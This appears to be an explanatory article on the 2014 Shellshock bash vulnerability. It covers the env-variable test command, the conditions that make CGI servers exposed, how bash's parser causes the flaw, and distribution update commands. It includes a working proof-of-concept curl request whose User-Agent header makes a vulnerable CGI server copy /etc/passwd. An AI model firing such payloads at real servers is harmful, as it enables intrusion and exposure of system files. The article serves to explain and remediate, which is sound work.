French Linux enthusiasts Stéphane Chazelas in mid-September 2014, discovered the famous BASH SHELL implementation vulnerability (ShellShock, number CVE-2014-6271), it can execute script code by constructing environment variables. This vulnerability can affect a large number of linux application interact with bash, so that the America National Security Division score this vulnerability 10 points, this is the most devastating score. This essay mainly discusses about the condition of the loophole occurrence, principle analysis, and vulnerability remediation methods.
Origin and Description of Vulnerability
Vulnerability Information has been firstly described in the 34,765 vulnerability report from exploit-db, a well-known vulnerabilities website, the paper gives a validation command:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If execute this command in linux/unix bash(Bash 4.3 or earlier version), you may get the following output:
vulnerable
this is a test
If the first line of result appear vulnerable, illustrate the system has a vulnerability of arbitrary commands execution caused by bash implementation bug. This problem exists GNU Bash 4.3 and earlier versions. Through adding some string after function definition in environment variable values, an attacker can change or bypass environmental restrictions to execute Shell command.
Condition of Vulnerability Occurrence
Any known application, as long as the following two conditions are met, it can be used to execute arbitrary commands via bash vulnerability:
- The program uses bash at some point processing environment variable assignments;
- The environment variable assignments string depending on user input.
Affected severely are the Apache servers using mod_cgi or mod_fcgid module, and must meet:
- After server receives the request, it will execute bash.
- When execute bash, it will set as environment variables like UserAgent.
Demonstration of Exploit Vulnerability, and Principle Analysis
Here is the test script:
$ curl -A ‘() { :; }; /bin/cat /etc/passwd > dumped_file’ http://192.168.0.1/poc.cgi
poc.cgi is a cgi script beginning with ` #! /bin/bash`.
On the server side things will happen:
-
Receives an HTTP request, the request with the Head
User-Agent: () {:;}; / bin / cat / etc / passwd> dumped_file -
The server set User-Agent as environment variable, and execute bash.
-
Because of bash parsing vulnerability, it execute the following script:
$ /bin/cat /etc/passwd > dumped_file
When shell interpreter deal with environment variable assignment, it execute the command after the function body. But the value of environment variable is a string, how was it transform into a function?
In fact, this is related to Bash Implementation. Define a function in Bash, the format is:
function function_name() {
body;
}
If Bash parser find a small brackets and braces while initializing environment variables, it treate the string as a function definition.
[root@baozenghui ~]$ say_hello='() { echo hello world; }'
[root@baozenghui ~]$ export say_hello
[root@baozenghui ~]$ bash -c 'say_hello'
hello world
Executing the above code in the new Bash process, say_hello became a function in the new environment, its evolution as follows:
- A new bash process scans at initialization, find parentheses and braces after environment variable
say_hello, figuring it’s a function definition. - Bash set
say_helloas a function name, and its value as a function of the body.
By combining patch, analysis Bash source code, in fact, Bash actually want to initialize environment variables and define some functions at startup,
By combining patch, analyzing Bash source code, in fact, Bash actually want to define some environment variables and functions at startup, the initialization way is to execute variable assignment statements(such as name = value format), when encounter a function definition, convert it into a function, that’s all the thing it wanted to do. But when bash scanning into the function definition, converting it into a function, it accidentally execute the next command for the sake of no comprehensive consideration when parsing. Therefore, statements added to determine the legality of the function body in the patch:
#define SEVAL_FUNCDEF 0x080 /* only allow function definitions */
#define SEVAL_ONECMD 0x100 /* only allow a single command */
if ((flags & SEVAL_FUNCDEF) && command->type != cm_function_def)
{
//illegal, not a function definition.
break;
}
Vulnerability Remediation
In UTC Time September 25, 2014 morning, CVE-2014-7169 vulnerability has been repaired by BASH community, the major GNU/Linux distributions, including Debian, Gentoo, OpenSUSE, CentOS, RHEL, have provided relevant upgrade.
centos:
$ yum clean all
$ yum makecache
$ yum -y update bash
ubuntu:
$ apt-cache gencaches
$ apt-get -y install --only-upgrade bash
debian:
$ apt-cache gencaches
$ apt-get -y install --only-upgrade bash
###Related Links: